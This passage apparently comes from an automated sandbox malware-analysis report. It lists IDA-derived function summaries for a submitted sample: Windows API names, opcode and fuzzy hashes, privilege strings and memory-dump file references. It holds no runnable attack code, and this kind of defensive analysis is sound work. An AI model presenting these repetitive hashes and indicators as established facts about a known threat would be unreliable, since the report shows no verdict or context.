                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 26cde9ff6a100412955907b86b9e0c80228dcd9fdbec816ea4acd55efa22fafd
                          • Instruction ID: 971e6e25f8a453124d44043a2e293c9e163c34736ffb0348487dae5c1de48d3d
                          • Opcode Fuzzy Hash: 26cde9ff6a100412955907b86b9e0c80228dcd9fdbec816ea4acd55efa22fafd
                          • Instruction Fuzzy Hash: 0E41D662B18E8182FA14EA16B94137AE252FB44BD0F948539EF4C07F9ADF3CD4959340
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                          • Instruction ID: a0349fd4fb73d5cc79cae3e07bab30d299cc95bbba7d6abc16c4d2b7854cfd60
                          • Opcode Fuzzy Hash: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                          • Instruction Fuzzy Hash: 91410462A08F41C0FB10AB25F94537BA362EB44BE4FA41138EA4D47699DF3CE0899624
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: HandleModule$AddressFreeLibraryProc
                          • String ID:
                          • API String ID: 3947729631-0
                          • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                          • Instruction ID: 83ce72d2483c69d220bf034bc258cd310d4be4d4d29decc2953e1ff5e76e7825
                          • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                          • Instruction Fuzzy Hash: 6141E631A19E5282FB54FB15FC9017AE2A1BF94B60FC14436DA0D17691EF3CE849E760
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                          • String ID:
                          • API String ID: 680105476-0
                          • Opcode ID: c531f2d93e59bc2c3255c3b03e21e7a52a1bb814650bbdd6308fec67296c0182
                          • Instruction ID: d93fc736e5019b5a9f752c3d47bdb6264956e534ae6aa58b8530840f144e5c2a
                          • Opcode Fuzzy Hash: c531f2d93e59bc2c3255c3b03e21e7a52a1bb814650bbdd6308fec67296c0182
                          • Instruction Fuzzy Hash: 7E21B562A18B5185FA14AF62B80127AE250FB05BF0FA80B30DE3D47BC5DF7CE056A314
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                          • Instruction ID: f5c63bba7640aec95f51c2caf66c5529f62e684d7e098ae3c5fb490b0d4978a2
                          • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                          • Instruction Fuzzy Hash: 9E11723290CB4286F611BB65BC4153BF2B5FB42360FE40534EA4D87799DF2CE808A760
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                          • Instruction ID: 24a7a1bf924d8ae18e092c66b95725c2c8b72430d38582c869b58ce9c1f5726e
                          • Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                          • Instruction Fuzzy Hash: 860188A2E18F8541FA11A728F84526AB361FFC97B4FC09231E69C076E9EF6CD0459714
                          APIs
                            • Part of subcall function 00007FF716141604: GetModuleHandleW.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF71614162B
                          • DloadProtectSection.DELAYIMP ref: 00007FF7161415C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: DloadHandleModuleProtectSection
                          • String ID:
                          • API String ID: 2883838935-0
                          • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                          • Instruction ID: d3302938bbda06216392f19f0f3f65e9ca0bef913d78612027f1f5cecae1373e
                          • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                          • Instruction Fuzzy Hash: BB119A71F18D4641FBA0BB09BC523B29361AF15369F950034DD0E472A1EF2CA89DE720
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                          • Instruction ID: b0ca38fd560696f2feffe0ca87369929c49339233559ae0ce81ac21cefd28859
                          • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                          • Instruction Fuzzy Hash: 90F0AF64B09A0349FE547669BD143B692909FC4B60FDC5430C90E873A1FF1CE5896130
                          APIs
                            • Part of subcall function 00007FF7161240BC: FindFirstFileW.KERNELBASE ref: 00007FF71612410B
                            • Part of subcall function 00007FF7161240BC: FindFirstFileW.KERNELBASE ref: 00007FF71612415E
                            • Part of subcall function 00007FF7161240BC: GetLastError.KERNEL32 ref: 00007FF7161241AF
                          • FindClose.KERNELBASE(?,?,00000000,00007FF716130811), ref: 00007FF716123EFD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Find$FileFirst$CloseErrorLast
                          • String ID:
                          • API String ID: 1464966427-0
                          • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                          • Instruction ID: 06fd70c17d194589e6d632c8440605125353edb72102c9befc6370e7d8a04115
                          • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                          • Instruction Fuzzy Hash: 46F0F462908A41C1FB10BF74B80017BB362AB1ABB4F64133CEA3D072C7CE28D4899765
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF71612207E), ref: 00007FF7161220F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                          • Instruction ID: f33f2f14fe89bf382b7524e3e520a7ffaaaeab558e9ea0dac78ad9979078bb5d
                          • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                          • Instruction Fuzzy Hash: 01F0A962A04A4285FB649B30F8417BEA671EB15B78F994339DB3C411D4DF2CD9D9D310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                          • Instruction ID: b73b4e693c452161275fa510f085185fa4641b1cb13667c1c354698e62753273
                          • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                          • Instruction Fuzzy Hash: 97F03462E09A4744FF5476B1BC602B692905F847B0FC85A30DD2E873C2EF2DA488A230
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: File
                          • String ID:
                          • API String ID: 749574446-0
                          • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                          • Instruction ID: 04f23d671cafc6f2f747c74d86f0f0dfbfab4945daeb3b5b8db5be1ad71fc0d3
                          • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                          • Instruction Fuzzy Hash: 4AE08C12A2492582FB64BB2AEC4267A9321AF89B94B885031CE0D07325CE28C4899A10
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID:
                          • API String ID: 3081899298-0
                          • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                          • Instruction ID: fae7a202de719e4e34a4cf7ad59c6377d671c5760dfac8d631d3ae4d1311ac59
                          • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                          • Instruction Fuzzy Hash: 98D0C912D0A891C2EA50A639AC5207EA251AF92735FF44721DA3EC16E1CA1DA49AB221
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                          • Instruction ID: 37b5222e680369738d6e0e09332d8300404fcceafb65c00b98b637e29a45f4f4
                          • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                          • Instruction Fuzzy Hash: 2EC08C20F0A902C1EB086B2ADCCA02B53A5BB40B14BB14039C52CC1120CE2CC4EEA355
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                          • API String ID: 2659423929-3508440684
                          • Opcode ID: 75b821c6db27436d22f5505910e7598aa5d0862ec495f4d94d2e237c059e9cbb
                          • Instruction ID: 5237da1c9f29ee3cb31948489765e1d867c08e20472ba994067bed4064c2c1d9
                          • Opcode Fuzzy Hash: 75b821c6db27436d22f5505910e7598aa5d0862ec495f4d94d2e237c059e9cbb
                          • Instruction Fuzzy Hash: 0D62B3A2F18E4285FB00EB74E8452BEA361AB857B4F904231DA6D57AD9DF3CD189D310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
